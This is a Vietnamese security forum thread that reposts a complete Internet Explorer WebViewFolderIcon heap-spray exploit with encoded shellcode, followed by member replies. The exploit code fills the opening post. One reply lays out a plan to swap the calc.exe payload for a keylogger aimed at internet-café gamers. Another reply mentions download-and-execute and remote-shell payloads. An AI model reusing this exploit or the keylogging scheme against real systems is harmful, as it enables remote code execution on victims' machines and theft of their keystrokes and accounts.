banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Bug mới của IE  XML
  [Discussion]   Bug mới của IE 30/09/2006 15:05:28 (+0700) | #1 | 26779
[Avatar]
zeno
Elite Member

[Minus]    0    [Plus]
Joined: 20/07/2004 03:57:09
Messages: 124
Location: HVA
Offline
[Profile] [PM]
Code:
<!--

..::[ jamikazu presents ]::..

Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2

Author: jamikazu 
Mail: <a href="mailto:jamikazu@gmail.com">jamikazu@gmail.com</a>

Bug discovered by Computer H D Moore (http://www.metasploit.com)

Credit: metasploit, SkyLined

invokes calc.exe if successful 

-->

<HTML>
<BODY>
<SCRIPT language="javascript">

	var heapSprayToAddress = 0x05050505;
	var payLoadCode = unescape(
	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
	"%uFF57%u63E7%u6C61%u0063");
	var heapBlockSize = 0x400000;
	var payLoadSize = payLoadCode.length * 2;
	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
	var spraySlide = unescape("%u0505%u0505");
	spraySlide = getSpraySlide(spraySlide,spraySlideSize);
	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
	memory = new Array();

	for (i=0;i<heapBlocks;i++)
	{
		memory[i] = spraySlide + payLoadCode;
	}

   	for ( i = 0 ; i < 128 ; i++) 
	{
		try{ 
			var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
			tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 ); 
		}catch(e){}
	}

	function getSpraySlide(spraySlide, spraySlideSize)
	{
		while (spraySlide.length*2<spraySlideSize)
		{
			spraySlide += spraySlide;
		}
		spraySlide = spraySlide.substring(0,spraySlideSize/2);
		return spraySlide;
	}

</SCRIPT> 

</BODY>
</HTML>

# milw0rm.com [2006-09-28]
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 01/10/2006 05:15:11 (+0700) | #2 | 26894
[Avatar]
hieuhoc
Member

[Minus]    0    [Plus]
Joined: 08/09/2006 21:57:39
Messages: 103
Offline
[Profile] [PM]
Với đoạn trên thì đâu có khai thác được gì.
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 01/10/2006 15:48:29 (+0700) | #3 | 27036
[Avatar]
zeno
Elite Member

[Minus]    0    [Plus]
Joined: 20/07/2004 03:57:09
Messages: 124
Location: HVA
Offline
[Profile] [PM]

hieuhoc wrote:
Với đoạn trên thì đâu có khai thác được gì. 

Đó chỉ là demo về bug mới của IE
Khai thác được hay không thì tùy vào mục đích & trình độ của người sử dụng
smilie)
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 30/11/2006 14:14:41 (+0700) | #4 | 27142
114v
Member

[Minus]    0    [Plus]
Joined: 08/07/2006 23:27:00
Messages: 191
Offline
[Profile] [PM]
Chả thấy có lỗi gì hết, chạy cả chục lần mà không thấy mở cái calc.exe lên gì cả!!!
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 03/12/2006 11:35:24 (+0700) | #5 | 27619
nguyenphanuy
Member

[Minus]    0    [Plus]
Joined: 13/07/2006 21:47:38
Messages: 3
Offline
[Profile] [PM] [Yahoo!]
Vậy làm sao để khai thác em là người mới mấy anh có thể chỉ cho em chỗ chứa tài liệu dạy cách khai thác các lỗi trên không !!!!
[Locked] [Up] [Print Copy]
  [Question]   Re: Bug mới của IE 10/12/2006 13:34:56 (+0700) | #6 | 29584
ducminhquan
Member

[Minus]    0    [Plus]
Joined: 16/03/2004 04:37:00
Messages: 3
Offline
[Profile] [PM]
Thiệt tình, có bug gồi mà ko bít khai thác nữa smilie

Cách khai thác đon giản nhất:
1) Tạo 1 keylogger, đặt tên là calc.exe, chép vào thư mục Windows\System32
2) Up cái file HTML trên lên host riêng của bạn (dùng host free cũng dc)
3) Vào IE, đặt địa chỉ file HTML trên host của bạn làm Homepage
2,3*) Cũng có thể đặt đại trong máy rùi copy đường dẫn vào phần homepage là được
=> Mỗi lần vào IE thì keyloger sẽ dc kích hoạt

Bạn nào pro hơn 1 chút có thể dùng cách này:
1,2) Tương tự trên
3) Các bạn để ý khi chạy game online, thì trang tin tức sẽ mở lên trong cửa sổ patcher (thực chất nó dùng IE để mở). Để khai thác, các bạn sửa chữa lại đường dẫn tới trang tin tức đó thành link đến file HTML trên host của bạn. (cách đổi thế nào thì các bạn phải tự tìm hiểu)
=> Mỗi lần mở game online thì keyloger sẽ được bật

Hiện nay mấy tiệm Game thường có sẵn chung trình antikeylogger, khi khách vào chơi khách sẽ dùng anti này để tắt hết các keylogger đang chay từ trước, vì thế dùng cách chạy keylogger khi statup sẽ ko khả thi, Vì thế có thể dùng cách trên để keylog.

P/S: Hem biết bài viết có vi phạm nội quy hok nữa, nếu vi phạm thì cho em xin lỗi và xóa dùm em bài này>
smilie)
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 10/12/2006 14:07:51 (+0700) | #7 | 29590
Mr.Khoai
Moderator

Joined: 27/06/2006 01:55:07
Messages: 954
Offline
[Profile] [PM]
Gửi ducminhquan: Bài viết không vi phạm nội quy đâu, nhưng lại hoàn toàn không thực tiễn và không thể thực hiện được! Hãy kiểm chứng trước khi viết, đừng chỉ "nghĩ" mà thôi.

khoai
[Locked] [Up] [Print Copy]
  [Question]   Re: Bug mới của IE 10/12/2006 14:12:47 (+0700) | #8 | 29592
ducminhquan
Member

[Minus]    0    [Plus]
Joined: 16/03/2004 04:37:00
Messages: 3
Offline
[Profile] [PM]
Tại sao vậy anh?????
[Locked] [Up] [Print Copy]
  [Question]   Re: Bug mới của IE 11/12/2006 05:49:53 (+0700) | #9 | 29698
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Code:
var payLoadCode = unescape(
 	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
 	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
 	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
 	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
 	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
 	"%uFF57%u63E7%u6C61%u0063");


Đây là ShellCode sẽ chèn vào khi IE bị bufferoverflow ,bộ đệm của IE bị tràn dẫn đến có thể chèn một mã máy vào đó để bắt IE thực hiện. Đây là dạng tấn công Remote BufferOverFlow, giúp có thể chiếm quyền kiểm soát hệ thống máy tính bị dính bug. Khai thác lỗi này ,kẻ thâm nhập cần có kiếm thức vững về cấu trúc x86 cũng như cách tổ chức của bộ nhớ mới có thể khai thác hiệu quả, còn các script kiddes chắc chắn chả làm được gì nhiều, nên đừng ngó làm gì.
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Locked] [Up] [Print Copy]
  [Question]   Re: Bug mới của IE 11/12/2006 05:51:40 (+0700) | #10 | 29699
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]

ducminhquan wrote:
Thiệt tình, có bug gồi mà ko bít khai thác nữa smilie

Cách khai thác đon giản nhất:
1) Tạo 1 keylogger, đặt tên là calc.exe, chép vào thư mục Windows\System32
2) Up cái file HTML trên lên host riêng của bạn (dùng host free cũng dc)
3) Vào IE, đặt địa chỉ file HTML trên host của bạn làm Homepage
2,3*) Cũng có thể đặt đại trong máy rùi copy đường dẫn vào phần homepage là được
=> Mỗi lần vào IE thì keyloger sẽ dc kích hoạt

Bạn nào pro hơn 1 chút có thể dùng cách này:
1,2) Tương tự trên
3) Các bạn để ý khi chạy game online, thì trang tin tức sẽ mở lên trong cửa sổ patcher (thực chất nó dùng IE để mở). Để khai thác, các bạn sửa chữa lại đường dẫn tới trang tin tức đó thành link đến file HTML trên host của bạn. (cách đổi thế nào thì các bạn phải tự tìm hiểu)
=> Mỗi lần mở game online thì keyloger sẽ được bật

Hiện nay mấy tiệm Game thường có sẵn chung trình antikeylogger, khi khách vào chơi khách sẽ dùng anti này để tắt hết các keylogger đang chay từ trước, vì thế dùng cách chạy keylogger khi statup sẽ ko khả thi, Vì thế có thể dùng cách trên để keylog.

P/S: Hem biết bài viết có vi phạm nội quy hok nữa, nếu vi phạm thì cho em xin lỗi và xóa dùm em bài này>
smilie)  


Nếu chỉ để chạy một keylogger được đặt sẵn trên máy nạn nhân thì chắc chả hacker nào ngồi mổ xẻ IE ra để tìm bug đâu smilie)
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 11/12/2006 08:25:40 (+0700) | #11 | 29737
mfeng
Researcher

Joined: 29/10/2004 15:16:29
Messages: 243
Offline
[Profile] [PM]
Exploit trên có payload chỉ exec calc.exe làm demo. Có thể sử dụng các payload khác như payload download & exec file, payload get remote shell... Tuy nhiên exploit này (cũng như một số exploit gần đây) sử dụng kỹ thuật Heap Spraying, khi exploit code được thực thi thường tốn rất nhiều bộ nhớ, có thể gây treo hệ thống và dễ gây nghi ngờ cho victim smilie.
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 08/01/2007 16:07:11 (+0700) | #12 | 34990
hmania
Member

[Minus]    0    [Plus]
Joined: 08/01/2007 03:09:06
Messages: 9
Offline
[Profile] [PM]
hình như bị patch rồi xài IE 7 thử không ra ~~ Windows Update chạy suốt ngày smilie
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 13/03/2007 11:07:30 (+0700) | #13 | 46301
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
các bác ngồi đây bàn tán nhưng ko biết đã ai success với cái bug này chưa. NẾu có thì làm cái video exploit cho anh em xem cái coai ^_^
[Locked] [Up] [Print Copy]
  [Question]   Bug mới của IE 13/03/2007 12:35:33 (+0700) | #14 | 46345
[Avatar]
SuperChicken
Elite Member

[Minus]    0    [Plus]
Joined: 11/07/2006 18:31:27
Messages: 635
Location: bottom of hell
Offline
[Profile] [PM]
# milw0rm.com [2006-09-28] 

Hix, có vẻ như hơi cũ, thậm chí tớ chỉ cài NOD32 bản cũ mèm (do expire nên lâu lắm rồi đâu có update), vậy mà copy cái code trên vào notepad xong rồi chẳng thể nào save lại đc (save xong chẳng thấy file đâu, do nó delete ngay lập tức :lolsmilie ). Thế thì làm sao test đc hả trời smilie(
Anyway, cool bug hỉ :lolsmilie (invoke đc calc.exe mà còn chê thì hết biết các pác đòi cái gì nữa giờ)
[Locked] [Up] [Print Copy]
  [Question]   Re: Bug mới của IE 22/04/2008 00:53:03 (+0700) | #15 | 126670
linh_kendy
Member

[Minus]    0    [Plus]
Joined: 20/04/2008 23:57:54
Messages: 1
Offline
[Profile] [PM]
em thử oài ! con này cái trình kiểm duyệt của em nó xóa luôn! sác định là 1 trojan mà ^^!
[Locked] [Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|